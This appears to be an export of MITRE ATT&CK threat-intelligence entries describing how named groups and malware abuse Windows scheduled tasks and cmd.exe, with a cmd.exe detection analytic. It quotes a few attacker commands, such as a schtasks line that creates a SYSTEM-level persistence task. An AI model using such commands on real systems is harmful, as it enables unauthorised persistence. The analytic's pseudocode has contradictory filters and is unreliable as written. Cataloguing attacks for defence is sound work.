[APT32](https://attack.mitre.org/groups/G0050) has used scheduled tasks to persist on victim systems.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has created a scheduled task to execute a .vbe file multiple times a day.(Citation: Symantec Elfin Mar 2019)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has created scheduled tasks to run malicious scripts on a compromised host.(Citation: Volexity InkySquid RokRAT August 2021)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks for persistence.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has used scheduled tasks for persistence and execution.(Citation: Cisco Talos Bitter Bangladesh May 2022)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used [schtasks](https://attack.mitre.org/software/S0111) to register a scheduled task to execute malware during lateral movement.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Scheduled Tasks to establish persistence on local and remote hosts.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used scheduled tasks to invoke Cobalt Strike including through batch script &lt;code&gt;schtasks /create /ru "SYSTEM" /tn "update" /tr "cmd /c c:\windows\temp\update.bat" /sc once /f /st&lt;/code&gt; and to maintain persistence.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has created Windows tasks to establish persistence.(Citation: Group IB Cobalt Aug 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has created scheduled tasks to maintain persistence on a compromised host.(Citation: TrendMicro Confucius APT Aug 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.(Citation: US-CERT TA18-074A)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has created scheduled tasks in the `C:\Windows` directory of the compromised network.(Citation: Mandiant FIN13 Aug 2022) 
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and [FrameworkPOS](https://attack.mitre.org/software/S0503).(Citation: FireEye FIN6 April 2016)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) malware has created scheduled tasks to establish persistence.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used scheduled tasks to maintain RDP backdoors.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) established persistence for [PoisonIvy](https://attack.mitre.org/software/S0012) by created a scheduled task.(Citation: Cybereason Soft Cell June 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has created scheduled tasks to launch executables after a designated number of minutes have passed.(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)	
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used a scheduled task to establish persistence for a keylogger.(Citation: Kaspersky Lyceum October 2021)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) dropped and added &lt;code&gt;officeupdate.exe&lt;/code&gt; to scheduled tasks.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional malware with scheduled tasks.(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;schtasks&lt;/code&gt; for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has created scheduled tasks to establish persistence for their tools.(Citation: Bitdefender LuminousMoth July 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has created scheduled tasks to maintain [Machete](https://attack.mitre.org/software/S0409)'s persistence.(Citation: 360 Machete Sep 2020)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used scheduled tasks to establish persistence and execution.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has created scheduled tasks to persistently run VBScripts.(Citation: Unit42 Molerat Mar 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has created a scheduled task to execute additional malicious software, as well as maintain persistence.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: McAfee Dianxun March 2021)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used schtasks.exe for lateral movement in compromised networks.(Citation: Bitdefender Naikon April 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has created scheduled tasks that run a VBScript to execute a payload on victim machines.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)
Patchwork
A [Patchwork](https://attack.mitre.org/groups/G0040) file stealer can run a TaskScheduler DLL to add persistence.(Citation: TrendMicro Patchwork Dec 2017)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) launched a scheduled task to gain persistence using the &lt;code&gt;schtasks /create /sc&lt;/code&gt; command.(Citation: Rancor Unit42 June 2018)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used scheduled tasks to stage its operation.(Citation: Cyber Forensicator Silence Jan 2019)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly.(Citation: Citizen Lab Stealth Falcon May 2016)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used scheduled tasks to establish persistence for installed tools.(Citation: Proofpoint TA2541 February 2022) 
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used scheduled task XML triggers.(Citation: FireEye TRITON 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to establish persistence for [TrickBot](https://attack.mitre.org/software/S0266) and other malware.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331)  has achieved persistence via scheduled tasks.(Citation: SentinelLabs Agent Tesla Aug 2020) 
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can create a scheduled task for persistence.(Citation: Cyberreason Anchor December 2019)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has created a scheduled SYSTEM task that runs when a user logs in.(Citation: CISA AppleJeus Feb 2021)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can create a scheduled task to maintain persistence on system start-up.(Citation: Telefonica Snip3 December 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use `schtasks.exe` to gain persistence.(Citation: BitDefender BADHATCH Mar 2021) 
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) creates a scheduled task to establish by executing a malicious payload every subsequent minute.(Citation: PaloAlto Patchwork Mar 2018)
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) persists using a scheduled task that executes every minute.(Citation: Palo Alto OilRig Sep 2018)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has used scheduled tasks to maintain persistence.(Citation: Crowdstrike GTR2020 Mar 2020)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606)’s &lt;code&gt;infpub.dat&lt;/code&gt; file creates a scheduled task to launch a malicious executable.(Citation: Secure List Bad Rabbit)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can create a scheduled task for persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can achieve persistence by copying its DLL to a subdirectory of %APPDATA% and creating a Visual Basic Script that will load the DLL via a scheduled task.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) can use the schtasks utility to bypass UAC.(Citation: Cybereason Kimsuky November 2020)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) creates several tasks for later execution to continue persistence on the victim’s machine.(Citation: ESET Carbon Mar 2017)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) uses scheduled tasks typically named "Watchmon Service" for persistence.(Citation: F-Secure Cosmicduke)
CozyCar
One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a scheduled task.(Citation: F-Secure CozyDuke)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has the ability to persist using scheduled tasks.(Citation: ESET Crutch December 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can use a scheduled task for installation.(Citation: SecureWorks August 2019)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has created a scheduled task for persistence.(Citation: Prevailion DarkWatchman 2021)
Disco
[Disco](https://attack.mitre.org/software/S1088) can create a scheduled task to run every minute for persistence.(Citation: MoustachedBouncer ESET August 2023)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) can maintain persistence via the creation of scheduled tasks within system directories such as `windows\system32\`, `windows\syswow64,` `winnt\system32`, and `winnt\syswow64`.(Citation: Red Canary Dridex Threat Report 2021) 
Duqu
Adversaries can instruct [Duqu](https://attack.mitre.org/software/S0038) to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.(Citation: Symantec W32.Duqu)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has maintained persistence through a scheduled task. (Citation: US-CERT Emotet Jul 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) has modules to interact with the Windows task scheduler.(Citation: Github PowerShell Empire)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has executed commands via scheduled tasks.(Citation: Cyphort EvilBunny Dec 2014)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) has used &lt;code&gt;sctasks&lt;/code&gt; for persistence. (Citation: SecureList Griffon May 2019)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a scheduled task.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)	
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) creates a scheduled task to ensure it is re-executed everyday.(Citation: Talos GravityRAT)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to set persistence using the Task Scheduler.(Citation: Group IB GrimAgent July 2021)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) has used a scheduled task for persistence.(Citation: ClearSky OilRig Jan 2017)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to use scheduled tasks for execution.(Citation: Symantec Ukraine Wipers February 2022)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)
ISMInjector
[ISMInjector](https://attack.mitre.org/software/S0189) creates scheduled tasks to establish persistence.(Citation: OilRig New Delivery Oct 2017)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has created a s</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments that may abuse the Windows command shell for execution. Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt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Process Creation
Monitor for newly executed processes that may abuse the Windows command shell for execution.
Note: This Analytic works by creating a baseline of parent processes of [cmd](https://attack.mitre.org/software/S0106) seen over the last 30 days and a list of parent processes of [cmd](https://attack.mitre.org/software/S0106) seen today. Parent processes in the baseline are removed from the set of parent processes seen today, leaving a list of new parent processes. This analytic attempts to identify suspicious programs spawning [cmd](https://attack.mitre.org/software/S0106) by looking for programs that do not normally create [cmd](https://attack.mitre.org/software/S0106).  It is very common for some programs to spawn [cmd](https://attack.mitre.org/software/S0106) as a subprocess, for example to run batch files or Windows commands. However, many processes don’t routinely launch a command prompt - e.g., Microsoft Outlook. A command prompt being launched from a process that normally doesn’t launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one.
&lt;h4&gt;Analytic 1&lt;/h4&gt;
&lt;code&gt;cmd == filter processes where ((event_id == "1" OR event_id == "4688") AND exe == "cmd.exe")
cmd == from cmd select parent_exe
historic_cmd == filter cmd (where timestamp &lt; now - 1 day AND timestamp &gt; now - 1 day)
current_cmd == filter cmd (where timestamp &gt;= now - 1 day)
new_cmd == historic_cmd - current_cmd &lt;/code&gt;
Execution Prevention
Use application control where appropriate.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used the `xp_cmdshell` command in MS-SQL.(Citation: Dragos Crashoverride 2018)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `cmd.exe` to execute commands and run malicious binaries.(Citation: DFIR Conti Bazar Nov 2021)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe` to execute reconnaissance commands.(Citation: Mandiant APT41)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors ran a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command-line (Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used `cmd.exe` to execute the wmiexec.vbs script.(Citation: Bitdefender FunnyDream Campaign November 2020)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and run command-line shells.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used batch scripts to perform reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), various implants used batch scripting and `cmd.exe` for execution.(Citation: McAfee Honeybee) 
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors spawned a new `cmd.exe` process to execute commands.(Citation: FoxIT Wocao December 2019) 
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `cmd.exe` to execute commands on remote machines.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has used the Windows command shell to execute commands, and batch scripting to automate execution.(Citation: Mandiant APT1)
APT18
[APT18](https://attack.mitre.org/groups/G0026) uses cmd.exe to execute commands on the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)(Citation: Anomali Evasive Maneuvers July 2015)
APT28
An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan uses a cmd.exe and batch script to run its payload.(Citation: Unit 42 Playbook Dec 2017) The group has also used macros to execute payloads.(Citation: Talos Seduploader Oct 2017)(Citation: Unit42 Cannon Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)
APT3
An [APT3](https://attack.mitre.org/groups/G0022) downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt;. The group also uses a tool to execute commands on remote computers.(Citation: FireEye Operation Double Tap)(Citation: Symantec Buckeye)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used cmd.exe for execution.(Citation: Cybereason Cobalt Kitty 2017) 
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used the command-line interface.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)
[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted and failed to run Bash commands on a Windows host by passing them to &lt;code&gt;cmd /C&lt;/code&gt;.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used batch scripts and the command-line interface for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used batch script files to automate execution and deployment of payloads.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used the Windows Command Shell and batch scripts for execution on compromised hosts.(Citation: NCC Group Chimera January 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.(Citation: Morphisec Cobalt Gang Oct 2018) The group has used an exploit toolkit known as Threadkit that launches .bat files.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) has used macros in Word documents that would download a second stage if executed.(Citation: Lookout Dark Caracal Jan 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.(Citation: Securelist Darkhotel Aug 2015)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including batch scripts.(Citation: US-CERT TA18-074A)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has executed malicious .bat files containing PowerShell commands.(Citation: FireEye FIN10 June 2017)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has leveraged `xp_cmdshell` and Windows Command Shell to execute commands on a compromised machine. [FIN13](https://attack.mitre.org/groups/G1016) has also attempted to leverage the ‘xp_cmdshell’ SQL procedure to execute remote commands on internal MS-SQL servers.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used &lt;code&gt;kill.bat&lt;/code&gt; script to disable security tools.(Citation: FireEye FIN6 Apr 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) used the command prompt to launch commands on the victim’s machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: Mandiant FIN7 Apr 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used a Batch file to automate frequently executed post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016) [FIN8](https://attack.mitre.org/groups/G0061) has also executed commands remotely via `cmd.exe`.(Citation: FireEye Obfuscation June 2017)(Citation: Bitdefender FIN8 July 2021)(Citation: Symantec FIN8 Jul 2023)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used cmd.exe likely as a password changing mechanism.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used the Windows command shell to execute commands.(Citation: Cybereason Soft Cell June 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used various batch scripts to establish C2 and download additional files. [Gamaredon Group](https://attack.mitre.org/groups/G0047)'s backdoor malware has also been written to a batch file.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Unit 42 Gamaredon February 2022)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use cmd.exe to download and execute payloads and to execute commands on the system.(Citation: Unit 42 Gorgon Group Aug 2018)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used `cmd.exe` to execute commands on the victim's machine.(Citation: Rapid7 HAFNIUM Mar 2021)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used &lt;code&gt;cmd.exe&lt;/code&gt; for execution.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used batch scripts on victim's machines.(Citation: Crowdstrike Indrik November 2018) 
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used batch scripts in its malware to install persistence mechanisms.(Citation: NCC Group APT15 Alive and Strong)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has executed Windows commands by using `cmd` and running batch scripts.(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses cmd.exe to execute commands on a compromised host.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: US-CERT SHARPKNOT June 2018)(Citation: Qualys LolZarus) A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) uses a batch file mechanism to delete its binaries from the system.(Citation: McAfee GhostSecret)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used batch files to deploy open-source and multi-stage RATs.(Citation: MalwareBytes LazyScripter Feb 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has used batch files to initiate additional downloads of malicious files.(Citation: 360 Machete Sep 2020)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used the command-line interface for code execution.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has used the Windows command line to execute commands.(Citation: SentinelLabs Metador Sept 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has executed HTA files via cmd.exe, and used batch scripts for collection.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Avira Mustang Panda January 2020)
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) used &lt;code&gt;cmd.exe /c&lt;/code&gt; within a malicious macro.(Citation: ESET Nomadic Octopus 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used macros to deliver malware such as [QUADAGENT](https://attack.mitre.org/software/S0269) and [OopsIE](https://attack.mitre.org/software/S0264).(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018) [OilRig](https://attack.mitre.org/groups/G0049) has used batch scripts.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) ran a reverse shell with Meterpreter.(Citation: Cymmetria Patchwork) [Patchwork](https://attack.mitre.org/groups/G0040) used JavaScript code and .SCT files on victim machines.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) has used cmd.exe to execute commmands.(Citation: Rancor Unit42 June 2018)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) has used command line during its intrusions.(Citation: Symantec Sowbug Nov 2017)
Suckfly
Several tools used by [Suckfly](https://attack.mitre.org/groups/G0039) have been command-line driven.(Citation: Symantec Suckfly May 2016)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has executed commands using &lt;code&gt;cmd.exe&lt;/code&gt;.(Citation: Trend Micro TA505 June 2019)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: Unit 42 TA551 Jan 2021)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used batch scripts to download tools and executing cryptocurrency miners.(Citation: ATT TeamTNT Chimaera September 2020)
Threat Group-1314
[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors spawned shells on remote systems on a victim network to execute commands.(Citation: Dell TG-1314)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used command-line interfaces for execution.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Unit42 Emissary Panda May 2019)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used Windows command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have used cmd.exe to execute commands.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used the Windows command line to perform hands-on-keyboard activities in targeted environments including for discovery.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used `cmd.exe` to execute commands on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)(Citation: Mandiant FIN12 Oct 2021)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to open a Windows Command Shell on a remote host.(Citation: Zscaler APT31 Covid-19 October 2020)
admin@338
Following exploitation with [LOWBALL](https://attack.mitre.org/software/S0042) malware, [admin@338](https://attack.mitre.org/groups/G0018) actors created a file containing a list of commands to be executed on the compromised computer.(Citation: FireEye admin@338)
menuPass
